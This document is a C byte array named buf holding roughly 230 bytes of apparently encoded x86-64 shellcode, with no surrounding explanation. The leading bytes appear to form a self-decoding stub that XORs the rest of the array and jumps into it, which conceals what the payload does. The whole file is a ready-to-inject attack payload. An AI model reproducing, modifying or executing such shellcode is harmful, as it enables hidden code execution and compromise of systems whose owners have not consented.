unsigned char buf[] = 
"\xeb\x27\x5b\x53\x5f\xb0\xc8\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\x4f\x11\x74\x07\x80\x3e\xc8\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x04\xc8\xef\x23\x5f\x57\x5b\xb4\x6a\xf8"
"\xaa\x71\xf9\x53\x5d\x57\x5a\x8e\x02\x34\x03\x4c\xfb\xc3"
"\x4c\xfb\xc2\x62\x85\x3b\xaf\x79\x70\x03\x84\x3a\x6a\x71"
"\xee\xef\xe2\xfb\xe5\xec\xd0\xfb\xfb\xfb\x06\x6a\xbc\x15"
"\x06\x06\x06\xbf\x06\x06\x06\x06\xbd\x07\x06\x06\x06\xbe"
"\x02\x06\x06\x06\xcb\x86\xbe\x05\x06\x06\x06\xbd\x06\x06"
"\x06\x06\xbf\x06\x06\x06\x06\xbc\x46\x06\x06\x06\xcb\x86"
"\x4e\x8d\x02\x23\x06\x06\x06\x06\x4e\x85\xe6\x07\x72\x1e"
"\xbc\x13\x06\x06\x06\xbf\x06\x06\x06\x06\xbd\x07\x06\x06"
"\x06\xbe\x02\x06\x06\x06\xcb\x86\xed\x10\xbc\x15\x06\x06"
"\x06\xbf\x06\x06\x06\x06\xbd\x07\x06\x06\x06\xbe\x02\x06"
"\x06\x06\xcb\x86\xbe\x07\x06\x06\x06\x37\xdd\xcb\x86\xaf"
"\x79\x4f\x11";
